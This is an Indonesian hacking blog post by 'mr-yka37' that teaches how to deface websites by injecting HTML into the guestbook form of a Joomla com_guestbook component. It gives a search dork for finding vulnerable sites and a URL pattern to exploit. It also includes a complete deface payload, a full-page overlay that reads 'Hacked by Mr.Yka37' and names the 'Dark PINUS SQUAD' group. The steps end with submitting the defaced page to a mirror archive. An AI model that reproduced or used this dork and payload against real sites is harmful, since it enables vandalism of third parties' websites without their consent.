>

Deface Metode GuestBook Arbitrary Code Injection

, ,
Hai ok mr-yka37 bakal share tutor lagi metode hacking Deface dengan metode GuestBook Arbitrary Code Injection

[+]Dork : inurl:option=com_guestbook [+]Exploit:  situs.co.li/[path-CMS]/index.php?option=com_guestbook                         situs.co.li/index.php?option=com_guestbook 

Ok langsung saja simak tutorialnya oce :*

1.Siapkan dulu code inject html nya :
<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; 
left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; 
height: 2698px; background-color: black; layer-background-color: black"><center> 
<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; 
left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; 
height: 2698px; background-color: black; layer-background-color: black"><center> 

====================================================================
gabungkan kode diatas dengan sc kalian,contohnya:
<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; 
left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; 
height: 2698px; background-color: black; layer-background-color: black"><center> 
<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; 
left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; 
height: 2698px; background-color: black; layer-background-color: black"><center> 
<p></p><font face="Orbitron" size="7" color="red"  class="a">Hacked by </font><font face='Allerta Stencil'
 size="7" color="white"  class="a"> Mr.Yka37<br>
 <img 
src="https://s-media-cache-ak0.pinimg.com/originals/f4/d9/7f/f4d97f562c72e5b08f3d4f1913c7398b.jpg" width="400" height="400">
 </font></center>
 <center>
<br>
<font face="Orbitron" size="4" color="white">i KNOW i SAD :'( </font> 
<h1 color="red">Dark PINUS SQUAD</h1>
<font face="Sedgwick Ave" size="4" color="white">(Perkumpulan Intelektual Nusantara)</font>
  <center><font color="red"><font SIZE="3">OFFICIAL MEMBER :</font></font></center><center><font 
face='Audiowide' size='4' color='white'> [M023L404] | Mr.Yka37 | DDIq | G DX | Mr.Eror404 | c_21 | Mr.kdb17 
|</font></center>
  <center><font color="red"><font SIZE="3">Sh00ts :</font></font></center><center><font face='Audiowide' 
size='4' color='white'>D4RK FR13NDS | SLEEPING DEFACER TEAM | ELDERSC0DE | GTX00 | ASTRA |</font></center>
  <font color="red" size='3'>contact:Mr.Yka37@cyber-wizard.com</font>


2.jika sudah disiapkan lalu dorking dengan dork diatas.pilih salah satu target .

2.Nah jika web menyediakan guestbook maka akan muncul tampilan form seperti dibawah ini untuk bagian nama/email/judul isi sesuka kalian.Nah untuk kolom deskripsi masukan code html tadi. Setelah itu klik send bla..bla...
 2.Jika web vuln maka tampilan guestbook berubah menjadi seperti ini,alias menjadi tampilan deface script kalian tadi.
 4.selanjutnya?miror lah ==>oce ya bos


at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Pages

Created By SoraTemplates | Distributed By Gooyaabi Templates